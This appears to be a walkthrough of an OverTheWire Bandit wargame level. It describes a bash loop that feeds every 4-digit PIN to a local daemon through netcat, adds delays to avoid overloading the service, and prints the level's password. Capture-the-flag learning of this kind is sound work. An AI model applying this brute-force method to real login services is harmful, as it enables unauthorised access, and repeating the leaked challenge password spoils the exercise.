Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.


Password: UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Alright. A daemon listening on port 30002. We need to give it the level 24 password and a secret 4 digit pincode.

Let’s just see what we’re dealing with.

Urgh. At least we know the format. But there’s 9,000 potential pincodes.

Brute-forcing sucks. It’s great when it works, but it just sucks. Let’s write a happy little BASH script to automate this.

Let’s make a happy little directory in /tmp.

Using vi, let’s create brute.sh.

Let’s run through it.

  1. Read bandit24‘s password and save it to a variable
  2. Loop between 1000 and 9999 and assign that value to i
    1. Print out the password and the generated number
    2. Pass to netcat via a pipe
    3. Append the output to a file
    4. Run command in background (quickly try next pincode)

Rather than set permissions, let’s run it directly…

Urgh. We’re brute-forcing too fast. While the daemon is unavailable, we’re potentially overshooting the correct pincode. Let’s add a little delay between each attempt.

This takes a few minutes to run.

0.02 x 9000 = 180s

This is why brute-forcing sucks.

You can experiment with different sleep values to try and speed your script up. I found the lowest I could go was 0.012.

Once it’s done, let’s check our output.

Oh joy, a bunch of repeated lines. If only we could find the one unique line.

Oh wait, we can.